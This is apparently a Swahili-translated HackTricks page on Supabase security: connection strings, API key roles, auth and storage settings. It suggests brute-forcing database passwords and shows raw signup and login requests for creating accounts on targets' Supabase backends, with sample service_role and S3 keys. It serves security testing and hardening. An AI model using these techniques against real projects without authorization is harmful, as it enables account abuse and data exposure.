Supabase Security

Support HackTricks

Taarifa za Msingi

Kulingana na ukurasa wao wa kutua: Supabase ni mbadala wa Firebase wa chanzo wazi. Anza mradi wako na hifadhidata ya Postgres, Uthibitishaji, APIs za papo hapo, Kazi za Edge, usajili wa Realtime, Hifadhi, na uwasilishaji wa Vecter.

Subdomain

K基本, wakati mradi unaundwa, mtumiaji atapata subdomain ya supabase.co kama: jnanozjdybtpqgcwhdiz.supabase.co

Mipangilio ya Hifadhidata

Taarifa hii inaweza kupatikana kutoka kiungo kama https://supabase.com/dashboard/project/<project-id>/settings/database

Hii hifadhidata itakuwa imewekwa katika eneo fulani la AWS, na ili kuungana nayo itakuwa inawezekana kuungana na: postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres (hii ilitengenezwa katika us-west-1). Neno la siri ni neno la siri ambalo mtumiaji aliweka awali.

Kwa hivyo, kwa kuwa subdomain ni maarufu na inatumika kama jina la mtumiaji na maeneo ya AWS ni ya kikomo, inaweza kuwa inawezekana kujaribu kuvunjavunja neno la siri.

Sehemu hii pia ina chaguzi za:

  • Kurekebisha neno la siri la hifadhidata

  • Kuunda muunganisho wa pooling

  • Kuunda SSL: Kata muunganisho wa maandiko wazi (kwa kawaida zimewezeshwa)

  • Kuunda ukubwa wa Diski

  • Kutumia vizuizi na marufuku za mtandao

Mipangilio ya API

Taarifa hii inaweza kupatikana kutoka kiungo kama https://supabase.com/dashboard/project/<project-id>/settings/api

URL ya kufikia API ya supabase katika mradi wako itakuwa kama: https://jnanozjdybtpqgcwhdiz.supabase.co.

funguo za api anon

Itazalisha pia funguo za API anon (role: "anon"), kama: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk ambayo programu itahitaji kutumia ili kuwasiliana na funguo ya API iliyofichuliwa katika mfano wetu katika

Inawezekana kupata API REST ya kuwasiliana na API hii katika docs, lakini mwisho wa kuvutia zaidi ungekuwa:

Usajili (/auth/v1/signup)

``` POST /auth/v1/signup HTTP/2 Host: id.io.net Content-Length: 90 X-Client-Info: supabase-js-web/2.39.2 Sec-Ch-Ua: "Not-A.Brand";v="99", "Chromium";v="124" Sec-Ch-Ua-Mobile: ?0 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36 Content-Type: application/json;charset=UTF-8 Apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk Sec-Ch-Ua-Platform: "macOS" Accept: */* Origin: https://cloud.io.net Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://cloud.io.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Priority: u=1, i

{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}

</details>

<details>

<summary>Ingia (/auth/v1/token?grant_type=password)</summary>

POST /auth/v1/token?grant_type=password HTTP/2 Host: hypzbtgspjkludjcnjxl.supabase.co Content-Length: 80 X-Client-Info: supabase-js-web/2.39.2 Sec-Ch-Ua: "Not-A.Brand";v="99", "Chromium";v="124" Sec-Ch-Ua-Mobile: ?0 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36 Content-Type: application/json;charset=UTF-8 Apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk Sec-Ch-Ua-Platform: "macOS" Accept: / Origin: https://cloud.io.net Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://cloud.io.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Priority: u=1, i

{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}

</details>

Hivyo, kila wakati unapotambua mteja anayetumia supabase na subdomain waliyotolewa (inawezekana kwamba subdomain ya kampuni ina CNAME juu ya subdomain yao ya supabase), unaweza kujaribu **kuunda akaunti mpya kwenye jukwaa kwa kutumia supabase API**.

### funguo za siri / huduma\_role api

Funguo ya siri ya API pia itaundwa na **`role: "service_role"`**. Funguo hii ya API inapaswa kuwa ya siri kwa sababu itakuwa na uwezo wa kupita **Usalama wa Kiwango cha Safu**.

Funguo ya API inaonekana kama hii: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354`

### JWT Siri

**JWT Siri** pia itaundwa ili programu iweze **kuunda na kusaini token za JWT za kawaida**.

## Uthibitishaji

### Usajili

<div data-gb-custom-block data-tag="hint" data-style='success'>

Kwa **kawaida** supabase itaruhusu **watumiaji wapya kuunda akaunti** kwenye mradi wako kwa kutumia viungo vya API vilivyotajwa hapo awali.

</div>

Hata hivyo, akaunti hizi mpya, kwa kawaida, **zitahitaji kuthibitisha anwani yao ya barua pepe** ili waweze kuingia kwenye akaunti. Inawezekana kuwezesha **"Ruhusu kuingia kwa siri"** ili kuruhusu watu kuingia bila kuthibitisha anwani yao ya barua pepe. Hii inaweza kutoa ufikiaji wa **data zisizotarajiwa** (wanapata majukumu `public` na `authenticated`).\
Hii ni wazo mbaya sana kwa sababu supabase inatoza ada kwa kila mtumiaji aliye hai hivyo watu wanaweza kuunda watumiaji na kuingia na supabase itatoza kwa hao:

<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

### Nywila & vikao

Inawezekana kuashiria urefu wa chini wa nywila (kwa kawaida), mahitaji (hapana kwa kawaida) na kuzuia matumizi ya nywila zilizovuja.\
Inapendekezwa **kuboresha mahitaji kwani yale ya kawaida ni dhaifu**.

* Vikao vya Watumiaji: Inawezekana kusanidi jinsi vikao vya watumiaji vinavyofanya kazi (muda wa kuisha, kikao 1 kwa mtumiaji...)
* Ulinzi wa Bot na Dhuluma: Inawezekana kuwezesha Captcha.

### Mipangilio ya SMTP

Inawezekana kuweka SMTP kutuma barua pepe.

### Mipangilio ya Juu

* Weka muda wa kuisha kwa funguo za ufikiaji (3600 kwa kawaida)
* Weka kugundua na kufuta funguo za upya zinazoweza kuwa na hatari na muda wa kuisha
* MFA: Onyesha ni vigezo vingapi vya MFA vinaweza kuandikishwa kwa wakati mmoja kwa mtumiaji (10 kwa kawaida)
* Max Direct Database Connections: Idadi ya juu ya muunganisho inayotumika kwa uthibitisho (10 kwa kawaida)
* Max Request Duration: Muda wa juu unaoruhusiwa kwa ombi la Auth kudumu (10s kwa kawaida)

## Hifadhi

<div data-gb-custom-block data-tag="hint" data-style='success'>

Supabase inaruhusu **kuhifadhi faili** na kuzipatia ufikiaji kupitia URL (inatumia S3 buckets).

</div>

* Weka kikomo cha ukubwa wa faili zinazopakiwa (kawaida ni 50MB)
* Muunganisho wa S3 unapatikana kwa URL kama: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3`
* Inawezekana **kuomba funguo za ufikiaji za S3** ambazo zinaundwa na `access key ID` (mfano `a37d96544d82ba90057e0e06131d0a7b`) na `secret access key` (mfano `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`)

## Edge Functions

Inawezekana **kuhifadhi siri** katika supabase pia ambazo zitakuwa **zinapatikana na edge functions** (zinaweza kuundwa na kufutwa kutoka kwenye wavuti, lakini haiwezekani kufikia thamani yao moja kwa moja).

<div data-gb-custom-block data-tag="hint" data-style='success'>

Learn & practice AWS Hacking:<img src="../.gitbook/assets/image (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/image (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

</div>

Last updated